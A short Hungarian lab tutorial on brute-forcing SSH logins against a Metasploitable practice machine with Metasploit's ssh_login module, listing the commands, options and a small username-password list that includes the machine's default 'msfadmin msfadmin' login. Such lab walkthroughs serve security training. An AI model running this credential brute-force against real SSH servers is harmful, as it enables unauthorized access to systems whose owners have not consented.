Az ftp után jöjjön a 22-es port.

msfconsole

search ssh login

másoljuk ki a következő találatot és állítsuk be a use paranccsal
use auxiliary/scanner/ssh/ssh_login

nézzük meg miket kell beállítani
show options

a következőket kell megadni RHOSTS, ez lesz a metasplitable ip címe.
Ami még kötelező az bizony egy külső fájl amiből a brute forcehoz szedi be lehetőségeket, itt több lehetőség közül is választhatunk, már ami a list formáját illeti. Megadhatunk külön jelszó és felhasználóneveket tartalmazó fileokat. Megadhatunk olyat ahol egy sorban, szóközzel vannak elválasztva a bejelentkezési adatok, és megadhatjuk azt is hogy csak felhasználóneveket tartalmaz a lista, és az adott felhasználónév lesz a jelszó is. Lássuk be van erre sok példa :)

Én a USERPASS_FILE mellett döntöttem, azaz egy sorban szóközzel elválasztva csináltam egy listát. Nem kell hosszú lista, hiszen inkább az a lényeg hogy hogy működik msfconsole-ban az ssh bruteforce. Az enyém a következőképp néz ki:

admin admin
root root
user pass
msfadmin login
msfadmin msfadmin

bizony, az utolsó sor a megfejtés.

adjuk meg ennek a filenak az elérési útját

set USERPASS_FILE /home/.../elérési út

majd a kényelem és az időspórolás kedvéért még két kapcsolót állítsunk true-ra, VERBOSE, STOP_ON_SUCCESS.
Előbbi segítségével láthatjuk hogy miket próbált meg, utóbbi pedig az első sikeres párosnál megáll.

Ellenőrizzük is le :)

ssh msfadmin@192.186.xxx.xxx
yes
msfadmin

és bent is vagyunk :)